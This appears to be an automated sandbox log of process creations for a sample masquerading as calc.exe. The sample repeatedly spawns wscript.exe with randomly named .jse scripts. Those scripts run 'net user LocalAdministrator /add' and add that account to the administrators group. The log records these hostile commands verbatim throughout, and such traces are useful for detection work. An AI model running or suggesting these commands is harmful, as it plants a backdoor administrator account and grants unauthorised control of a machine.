Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" argZvAmXhN.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: unknown | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" RBRDMGZ065.jse | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" ikKn7NiVR4.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" GEWDiMGgJw.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" zoIZ7M03Hi.jse | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" auMkVSqKRe.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" LQzxvucZpT.jse | |
Source: unknown | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" F0YCw5KB4j.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iZjt7hG7RY.jse | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" i7di6FEfYu.jse | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" T2uXzwcslK.jse | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" ExsxGqx0Fo.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JI8Y5YVUqE.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" B2G43eAZZY.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fpiLr93KlC.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" WQTz1XtcXV.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BjFMi3zobq.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Xv6oI7oFep.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5RDffnTbZa.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xIrKq0jy1l.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" bBF4cMvje3.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xdbrdZA2Mp.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7s3912SDjb.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" dIsc26ydj8.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7G6GlIeRfv.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" AiCGETgrpF.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" FB3eszo6iK.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 90NgPeo2cD.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JEsdrI4PXS.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
